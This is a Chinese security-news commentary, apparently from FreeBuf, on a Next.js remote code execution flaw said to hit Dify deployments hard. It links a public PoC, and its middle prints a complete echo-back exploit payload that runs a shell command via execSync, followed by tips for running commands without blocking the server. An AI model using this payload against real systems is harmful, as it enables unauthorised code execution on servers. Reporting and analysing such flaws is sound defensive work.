反转!dify将昨天的next.js跳蛋漏洞变为大漏洞!dify利用率较高!
文章讨论了Next.js框架中的远程代码执行(RCE)漏洞及其影响。该漏洞被指为严重威胁,并导致dify平台成为重灾区。文中提供了GitHub上的PoC链接,并指出已有更复杂的Exploit出现。作者提醒开发者避免使用阻塞式命令,并对先前对独眼情报的不当评价表示歉意。 2025-12-5 05:10:35 Author: www.freebuf.com(查看原文) 阅读量:4 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

就在昨天我还发了一篇文章指责核弹,最新Next.js rce漏洞是核弹?实则跳蛋......无良公众号为了流量脸都不要,没想到光速反转打脸。在最新的利用中,dify成为重灾区,利用成功率较高,github的poc:

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

此poc为无回显rce,最新已出现有回显的exp:

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

各位在测试中需要注意,应尽量避免使用execSync函数执行可能造成系统阻塞的命令(如ping,curl,wget等),因为Node.js是单线程事件循环模型,execSync会阻塞整个事件循环,导致所有请求都被阻塞。推荐使用异步exec。

在此向昨天文章中被提起的独眼情报道歉,这确实是影响面较大的漏洞,虽然还是无法与log4j2比较,但昨天文章中对独眼情报的评价有误,在此致歉。

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/460614.html
如有侵权请联系:admin#unsafe.sh